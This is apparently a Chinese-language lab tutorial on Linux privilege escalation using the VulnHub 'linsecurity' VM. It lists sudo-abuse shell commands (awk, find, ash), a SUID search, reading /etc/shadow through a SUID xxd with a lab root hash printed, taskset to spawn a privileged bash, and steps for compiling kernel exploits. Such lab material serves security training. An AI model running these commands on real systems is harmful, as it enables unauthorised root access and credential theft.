linux提权

目录

一、linux提权靶场下载与安装

二、基础提权 

 1.sudo提权

 2.suid提权

3.taskset执行bash 

三、内核提权 

相关网站

https://gtfobins.github.io/#+sudo
 
https://blog.csdn.net/weixin_43873557/article/details/113784146

一、linux提权靶场下载与安装

#下载链接
https://www.vulnhub.com/entry/linsecurity-1,244/
 
用户名密码：bob/secret
 
#安装与配置
1.修改默认键盘布局[默认不是美式键盘]
sudo awk 'BEGIN {system("/bin/sh")}'
[修改前\"符号是shift+2]
 
vim /etc/default/keyboard
[讲XKBLAYOUT改的值为us]
 
setupcon
 
2.配置网卡[Ubuntu 18通过netplan设置网络]
vim /etc/netplan/50-cloud-init.yaml
[将enp0s3改为ens33]
 
netplan apply
 

二、基础提权 

 1.sudo提权

sudo权限是root把本来只能超级用户执行的命令赋予普通用户执行

1. sudo /bin/ash
2. sudo find . -exec /bin/sh \;-quit
3. sudo /bin/bash

sudo -i

 2.suid提权

suid简介：SUID这个是uid +s的组合，s指的是特殊权限。一般情况下，用户的权限是3位，比如0755这样的，特殊权限默认没有配置，但是如果超级管理员希望用户在执行一些特殊权限文件时，拥有root的权限，就会配置特殊权限

使用find命令快速查找所有suid文件

find / -user root -perm -4000 -print 2>/dev/null

xxd访问/etc/shadow

-rwsr-x--- 1 root itservices 18552 Apr 10  2018 /usr/bin/xxd

 itservices组具有执行权限，通过/etc/group发现susan用户属于itservices用户组，利用4.隐藏文件发现的密码登录susan用户，进行提权

cd home/susan

susan@linsecurity:/home/bob$ xxd "/etc/shadow" |xxd -r
root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
 

3.taskset执行bash 

taskset 1 /bin/bash -p

三、内核提权 

将linux内核提权速查脚本移到Linux系统中

查询该文件

进行解压缩 

进入解压后的文件，并执行里面的后缀为.sh的文件

 成功后就可以查看推荐的漏洞

 将推荐的漏洞下载到本地，复制到Linux系统中，进行解压缩

进入解压后的文件

 存在makefile，进行编译make

 查看编译后的文件，发现新增，进行执行该文件

 运行文件，不能成功，则换其他漏洞